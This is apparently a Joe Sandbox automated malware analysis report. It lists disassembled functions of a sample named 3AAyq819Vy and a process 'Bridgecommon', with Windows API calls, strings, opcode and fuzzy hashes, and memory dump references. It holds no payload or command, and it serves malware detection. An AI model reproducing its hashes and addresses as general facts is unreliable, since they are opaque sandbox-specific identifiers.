                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: f34ef2efd8cbe87bba76cd83ac00d7ff19fad5d6d2a6c6a09c0b2d3c02cebd77
                                                                                              • Instruction ID: 3239e2e265ef38366ee5f83e23f95c747b8faab11ce68b76d6c535ac439fe31f
                                                                                              • Opcode Fuzzy Hash: f34ef2efd8cbe87bba76cd83ac00d7ff19fad5d6d2a6c6a09c0b2d3c02cebd77
                                                                                              • Instruction Fuzzy Hash: 3431AE72A0021AABDF25DF65CC95EAE7BA5EB01310F04412DFC18E6250E735DE51EB90
                                                                                              Function 00CBA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00CBA666
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CBA675
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CBA683
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00CBA691
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: c12ea386b1e01fdf0297a1fe8422dfdef6d2d27461a53b8a4500113eebcb19b0
                                                                                              • Instruction ID: 316bd8c15f707d4b20bf655313e5955d14e36be3890575d50a8861fb2c515eb7
                                                                                              • Opcode Fuzzy Hash: c12ea386b1e01fdf0297a1fe8422dfdef6d2d27461a53b8a4500113eebcb19b0
                                                                                              • Instruction Fuzzy Hash: 66E0EC71943721ABD2615F61AC5DB8B3E58EB05B52F014501FB0DDA2D0DB6486048BB1
                                                                                              Function 00CBA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CBA699: GetDC.USER32(00000000), ref: 00CBA69D
                                                                                                • Part of subcall function 00CBA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CBA6A8
                                                                                                • Part of subcall function 00CBA699: ReleaseDC.USER32(00000000,00000000), ref: 00CBA6B3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00CBA83C
                                                                                                • Part of subcall function 00CBAAC9: GetDC.USER32(00000000), ref: 00CBAAD2
                                                                                                • Part of subcall function 00CBAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CBAB01
                                                                                                • Part of subcall function 00CBAAC9: ReleaseDC.USER32(00000000,?), ref: 00CBAB99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              • Opcode ID: ff3c42af5c05f546096d9e7c92fa3e4862dac8d3885f6a4489b5b26185f4a123
                                                                                              • Instruction ID: 24283c795ebf55ba311687a479f2e4238c5e0338bb1ba2ea799c88d1ce6d3c80
                                                                                              • Opcode Fuzzy Hash: ff3c42af5c05f546096d9e7c92fa3e4862dac8d3885f6a4489b5b26185f4a123
                                                                                              • Instruction Fuzzy Hash: E491DFB1608354AFD610DF25D848A6BBBE8FFC9701F00491EF59AD3261DB31A945CF62
                                                                                              Function 00CA75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA75E3
                                                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                                                • Part of subcall function 00CAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA777F
                                                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                              • String ID: :
                                                                                              • API String ID: 3226429890-336475711
                                                                                              • Opcode ID: e32617a30bd0f8192b37a8558b60ac68edb3e78302be050a7b868eb510d78660
                                                                                              • Instruction ID: 600ff1adc45023a5dfd324b8f9262b60fbe0551cf3a945d4ef0b0dd8c3312593
                                                                                              • Opcode Fuzzy Hash: e32617a30bd0f8192b37a8558b60ac68edb3e78302be050a7b868eb510d78660
                                                                                              • Instruction Fuzzy Hash: 364160B1801159AAEF25EB64CC5AEEEB37CEF56304F004196B609A2092DB745F88DF61
                                                                                              Function 00CBB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: }
                                                                                              • API String ID: 176396367-4239843852
                                                                                              • Opcode ID: f2f01826acc8fa5eba0398b833c9e90aafa8da3ff4c9c4cd261b4d8777d3673e
                                                                                              • Instruction ID: e284b9ec8fd151cfe9087dbd3e340fd29608394d1ba10e8e57ce9083df59d509
                                                                                              • Opcode Fuzzy Hash: f2f01826acc8fa5eba0398b833c9e90aafa8da3ff4c9c4cd261b4d8777d3673e
                                                                                              • Instruction Fuzzy Hash: 3D21F07290435A5AD731EA64D845FABB3ECEF91750F04042EF640C3242EBA4DE4C93A3
                                                                                              Function 00CAF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CAF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
                                                                                                • Part of subcall function 00CAF2C5: GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00CAF33E), ref: 00CAF3D2
                                                                                              Strings
                                                                                              • CryptUnprotectMemory failed, xrefs: 00CAF3CA
                                                                                              • CryptProtectMemory failed, xrefs: 00CAF389
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              • Opcode ID: 802a3c6354e440062b10d9c060e518efa49699695104ef24f01a67ff8b81186b
                                                                                              • Instruction ID: b225660c708de47529ba057c39db3f000569399bcb109c329eef401d28b32241
                                                                                              • Opcode Fuzzy Hash: 802a3c6354e440062b10d9c060e518efa49699695104ef24f01a67ff8b81186b
                                                                                              • Instruction Fuzzy Hash: 7D112631A0226AABEF15AF71DD45B6E3754FF02768B04812EFC156F2A1DA309E038791
                                                                                              Function 00CAB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00CAB9B8
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 1543624204-3142399695
                                                                                              • Opcode ID: 9516d1cc1832f4d2e82a8a739fa80c814c0904479488cab11c615a61563cfdfa
                                                                                              • Instruction ID: 1fbf53ea4dd70cb0478871ede05e597c26ddc8b9dec8c1a7ef5c8afbc93e3ac8
                                                                                              • Opcode Fuzzy Hash: 9516d1cc1832f4d2e82a8a739fa80c814c0904479488cab11c615a61563cfdfa
                                                                                              • Instruction Fuzzy Hash: E701F563504313799A306B75DC42E6BABACEE93774B40841EF558D6083EB30DD40A3B1
                                                                                              Function 00CB101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,00CB1160,?,00000000,00000000), ref: 00CB1043
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00CB108A
                                                                                                • Part of subcall function 00CA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6C54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              • Opcode ID: 328af12b1862f3eb6c6ec73d6810fdf552c6e8f12a76fac066617002cc68fa32
                                                                                              • Instruction ID: dda9d09fb4c72039174b0027eb1aec8914a5510f2176e183392a857516f05960
                                                                                              • Opcode Fuzzy Hash: 328af12b1862f3eb6c6ec73d6810fdf552c6e8f12a76fac066617002cc68fa32
                                                                                              • Instruction Fuzzy Hash: EE01FEB53443496FD334AF68AC51BBAB368EB80755F14003EFE4656180CAB168C54724
                                                                                              Function 00CA1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CAE2E8: _swprintf.LIBCMT ref: 00CAE30E
                                                                                                • Part of subcall function 00CAE2E8: _strlen.LIBCMT ref: 00CAE32F
                                                                                                • Part of subcall function 00CAE2E8: SetDlgItemTextW.USER32(?,00CDE274,?), ref: 00CAE38F
                                                                                                • Part of subcall function 00CAE2E8: GetWindowRect.USER32(?,?), ref: 00CAE3C9
                                                                                                • Part of subcall function 00CAE2E8: GetClientRect.USER32(?,?), ref: 00CAE3D5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                              • SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              • API String ID: 2622349952-4108050209
                                                                                              • Opcode ID: 3e1aba4d05410b4437c42b18dbd62cc70656af143f4607e6f6e5e83c38389788
                                                                                              • Instruction ID: ea258e81fdba878a2032b38d35a79bcf717d0e7cfc844d4da8758ec16181c7a5
                                                                                              • Opcode Fuzzy Hash: 3e1aba4d05410b4437c42b18dbd62cc70656af143f4607e6f6e5e83c38389788
                                                                                              • Instruction Fuzzy Hash: 07F0447010638AA6DF151F518C0D7E93B59AF46348F0C4214FD58955B1DB74CB90EA50
                                                                                              Function 00CB0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00CB1206,?), ref: 00CB0FEA
                                                                                              • GetLastError.KERNEL32(?), ref: 00CB0FF6
                                                                                                • Part of subcall function 00CA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6C54
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CB0FFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: 5682b1f01336965cc3cff3882c0a3e5cfcd50d9f926ddab2c1c2880a90cef0b0
                                                                                              • Instruction ID: 4e2b23dec670c21dd300c55361b6202a102b13f2e39f00fa64d22b79d5a15b0e
                                                                                              • Opcode Fuzzy Hash: 5682b1f01336965cc3cff3882c0a3e5cfcd50d9f926ddab2c1c2880a90cef0b0
                                                                                              • Instruction Fuzzy Hash: 73D02E725081613BCA103328AC0AEAF7A04AB22335F680716F639622F2CA244A916292
                                                                                              Function 00CAE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00CADA55,?), ref: 00CAE2A3
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CADA55,?), ref: 00CAE2B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: 911fc5ada35581a7ed4dc20b1be663cebae5a4e9fdf4f43823ebd18b245f9b11
                                                                                              • Instruction ID: 9d910b4600ea231d9fd5219ed2fac13fb95d12faeda55f20478e2bdf5407bf46
                                                                                              • Opcode Fuzzy Hash: 911fc5ada35581a7ed4dc20b1be663cebae5a4e9fdf4f43823ebd18b245f9b11
                                                                                              • Instruction Fuzzy Hash: D7C0123124179166E63037646C0DB47AB585B01B15F05046AB645E92D1DAA5D54086E1
                                                                                              Function 00CCBEE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandLine
                                                                                              • String ID: `%y
                                                                                              • API String ID: 3253501508-1992035149
                                                                                              • Opcode ID: 246c8c5b35ab68abc094f4ca059469884378b1d8098a11b1cd0fa13cb85c031a
                                                                                              • Instruction ID: 3d4436931440cffc68e81586b9388e5687a30c4a5cd6e41e18119a1603c8297a
                                                                                              • Opcode Fuzzy Hash: 246c8c5b35ab68abc094f4ca059469884378b1d8098a11b1cd0fa13cb85c031a
                                                                                              • Instruction Fuzzy Hash: C8B048B8C022898FC7008F20B84C31C7BA0AA083023C050679809C6B20DA364186CF21

                                                                                              Execution Graph

                                                                                              Execution Coverage:6.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 9184 7ffd9be76381 9185 7ffd9be7639f QueryFullProcessImageNameA 9184->9185 9187 7ffd9be76544 9185->9187

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BAD0D78 Relevance: .3, Instructions: 257COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a6758524124fe6365b3c754046f21fea635bc6654b6a3b82c88781a877662752
                                                                                              • Instruction ID: 4d338ca8df61c178826b7f07554e8f14d5279b0b1fcc108a3fb6dc2b6740983d
                                                                                              • Opcode Fuzzy Hash: a6758524124fe6365b3c754046f21fea635bc6654b6a3b82c88781a877662752
                                                                                              • Instruction Fuzzy Hash: 4E91CE71A18A894FE799DBAC88797A87FE1FF99318F0002BED059D72D6CBB85411C740
                                                                                              Function 00007FFD9BE76381 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1997541214.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9be70000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullImageNameProcessQuery
                                                                                              • String ID:
                                                                                              • API String ID: 3578328331-0
                                                                                              • Opcode ID: 8f8f18d83c87b1fe0d97d73091208e712db5ad18f6a2934521b356b4bb4d7a2b
                                                                                              • Instruction ID: ee53c9ce52dfaa307ad52bb74c1aaa2119e0c6f29c580c597983f1a7561d3f47
                                                                                              • Opcode Fuzzy Hash: 8f8f18d83c87b1fe0d97d73091208e712db5ad18f6a2934521b356b4bb4d7a2b
                                                                                              • Instruction Fuzzy Hash: D681BF30618A8D8FDB68DF28C8957F937E1FB59315F10423EE84EC7292DA75A941CB81
                                                                                              Function 00007FFD9BAD08E8 Relevance: .1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 971072df3818c1190adfef7e00fd846d6c3b0d90dd967b1a3fc5eb4214d020d2
                                                                                              • Instruction ID: 04310598fade5cbe128115e467cd22ffa5b26d210cb805fd209eb1b17dad1cce
                                                                                              • Opcode Fuzzy Hash: 971072df3818c1190adfef7e00fd846d6c3b0d90dd967b1a3fc5eb4214d020d2
                                                                                              • Instruction Fuzzy Hash: 6431043130D9184FDB68EB5CE88A9B977D0EF9932130642BBE48AC7166D911EC828781
                                                                                              Function 00007FFD9BAD0998 Relevance: .1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
